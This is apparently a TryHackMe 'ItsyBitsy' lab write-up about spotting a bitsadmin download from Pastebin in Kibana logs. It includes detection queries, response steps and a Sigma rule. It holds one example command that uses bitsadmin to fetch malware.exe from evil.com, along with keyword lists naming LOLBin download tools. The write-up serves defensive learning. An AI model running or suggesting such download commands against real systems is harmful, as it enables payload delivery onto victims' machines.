TryHackMe ItsyBitsy: When 0.4% of Traffic is 100% Malicious
Found a compromised machine by doing the opposite of what I thought was right. The suspicious IP had only 2 events out of 1,482. Sometimes the quietest connection is the loudest alarm.
Found a compromised machine by doing the opposite of what I thought was right. The suspicious IP had only 2 events out of 1,482. Sometimes the quietest connection is the loudest alarm.
The Setup
IDS alert: Possible C2 communication from the HR department.
What I had:
- ELK Stack (Elasticsearch + Kibana)
- March 2022 logs
- 1,482 events total
- No idea which user was compromised
Access: http://MACHINE_IP — Login: elastic/elastic
The Wrong Assumption That Almost Got Me
I opened Kibana, clicked on source_ip field, and saw this:
192.166.65.52: 1,480 events (99.6%)
192.166.65.54: 2 events (0.4%)
My first instinct: "Obviously the IP with 1,480 connections is the problem."
I was completely wrong.
Why Volume ≠ Suspicion
Here's what the high-volume IP (192.166.65.52) was doing:
- Normal web browsing
- Multiple different destinations
- Standard Mozilla user agent
- Typical office worker behavior
Here's what the low-volume IP (192.166.65.54) was doing:
- Only 2 connections
- Both to the same destination
- User agent: bitsadmin
- This is our guy
Key lesson: Attackers try to be quiet. They don't want to show up in your top 10 talkers list.
What the Hell is BITSAdmin?
When I saw the user agent bitsadmin, I had to look it up.
BITSAdmin = Background Intelligent Transfer Service Administration
It's a legitimate Windows tool for:
- Managing download/upload jobs
- Windows Update uses it
- Transferring files in the background
Why attackers love it:
- Pre-installed on every Windows machine
- Signed by Microsoft
- Often whitelisted by security tools
- Can download files from the internet
- It's a Living-off-the-Land Binary (LOLBin)
Command-line example:
bitsadmin /transfer myDownloadJob /download /priority normal http://evil.com/malware.exe C:\temp\malware.exe
Normal users don't use BITSAdmin. If you see it in your logs, investigate immediately.
Finding the C2 Server
I filtered for the suspicious IP:
source_ip: 192.166.65.54
Looking at the host field, I found: pastebin.com
Wait, Pastebin? The text-sharing site?
Why Pastebin Makes Perfect C2
Attackers use legitimate services as C2 infrastructure because:
Pros for attackers:
- Free and anonymous
- HTTPS by default (encrypted)
- Hard to block without breaking legitimate business
- Blends with normal traffic
- No infrastructure to maintain
Cons for defenders:
- Can't just block Pastebin (users need it)
- Looks like normal web traffic
- No obvious malicious indicators
Other services commonly abused:
- GitHub Gists
- Google Drive
- Dropbox
- Discord
- Telegram
The Full Attack Chain
Step 1: Initial Compromise User machine gets infected (method unknown from these logs)
Step 2: Tool Transfer Attacker uses BITSAdmin to download malware:
Source: 192.166.65.54
Destination: pastebin.com/yTg0Ah6a
User Agent: bitsadmin
Step 3: C2 Communication Malware connects back to Pastebin for commands/data
Full URL: https://pastebin.com/yTg0Ah6a
When I visited the URL (in a VM, not on my real machine!), I found the malicious payload with the flag.
What I Learned
1. Low Frequency = High Suspicion
In a dataset of 1,482 events:
- 1,480 events from one IP = probably normal
- 2 events from another IP = investigate this first
Why?
- Attackers minimize their footprint
- C2 beacons are often low-volume
- Malware downloads happen once, then go quiet
Detection strategy:
Look for:
- Unusual user agents (bitsadmin, certutil, curl, wget)
- Single connections to file-sharing sites
- Non-browser traffic to web services
2. User Agent Analysis is Critical
Normal traffic user agents:
Mozilla/5.0 (Windows NT 10.0; Win64; x64)...
Chrome/98.0.4758.102...
Suspicious user agents:
bitsadmin
certutil
python-requests/2.25.1
curl/7.68.0
Kibana query:
user_agent: (bitsadmin OR certutil OR curl OR wget OR python-requests)
3. Context Beats Signatures
A connection to Pastebin isn't inherently malicious, but:
- From an HR user +
- Using BITSAdmin +
- Only 2 connections +
- After an IDS alert
= High confidence compromise
The Quick Win Queries
Find low-frequency IPs:
In Kibana: Click source_ip field → Sort by count ascending
Find suspicious user agents:
user_agent: *bitsadmin* OR user_agent: *certutil*
Find file-sharing site access:
host: *pastebin.com* OR host: *paste.ee* OR host: *controlc.com*
Combine them:
source_ip: 192.166.65.54 AND user_agent: *bitsadmin*
Real-World Response
If I found this in production:
Immediate (5 minutes):
- Isolate the infected machine (192.166.65.54)
- Block pastebin.com/yTg0Ah6a at the firewall
- Disable the compromised user account
Investigation (1 hour):
- Check what else this IP contacted
- Search for other machines using BITSAdmin
- Review recent downloads to this machine
- Check for lateral movement attempts
Hunting queries:
# Find other BITSAdmin usage
user_agent: *bitsadmin*
# Find other Pastebin connections
host: *pastebin.com*
# Find unusual user agents
user_agent: * AND NOT user_agent: *Mozilla* AND NOT user_agent: *Chrome*
Long-term fixes:
- Monitor LOLBin usage (BITSAdmin, Certutil, etc.)
- Implement application whitelisting
- Require proxy authentication for external sites
- Enable command-line logging on all endpoints
MITRE ATT&CK Mapping
This attack maps to:
T1105 — Ingress Tool Transfer Using BITSAdmin to download payload
T1071.001 — Application Layer Protocol: Web Protocols HTTPS C2 communication
T1567.002 — Exfiltration to Code Repository Using Pastebin as C2
T1218 — System Binary Proxy Execution Abusing legitimate Windows binary (BITSAdmin)
Final Thoughts
This room taught me to trust the anomalies, not the volume.
When I first saw the stats:
- 99.6% of traffic from one IP
- 0.4% of traffic from another IP
My instinct said "investigate the 99.6%." The data said "investigate the 0.4%."
The data was right.
In SOC work, you're looking for needles in haystacks. Sometimes the smallest needle is the sharpest.
Detection Rule for Your SIEM
Here's a Sigma rule for detecting this:
title: LOLBin Network Activity Detection
status: experimental
description: Detects network connections from LOLBins
references:
- https://lolbas-project.github.io/
logsource:
category: proxy
detection:
selection:
c-useragent:
- '*bitsadmin*'
- '*certutil*'
- '*curl*'
- '*wget*'
condition: selection
falsepositives:
- Legitimate administrative activity
level: highRelated posts:
- Benign: The Imposter Account That Almost Fooled Me
- CVE-2024–42327: Real Zabbix SQL Injection
Tags: #TryHackMe #ELK #Kibana #LOLBins #C2Detection #SOC #ThreatHunting
Questions? Found a better approach? Drop a comment.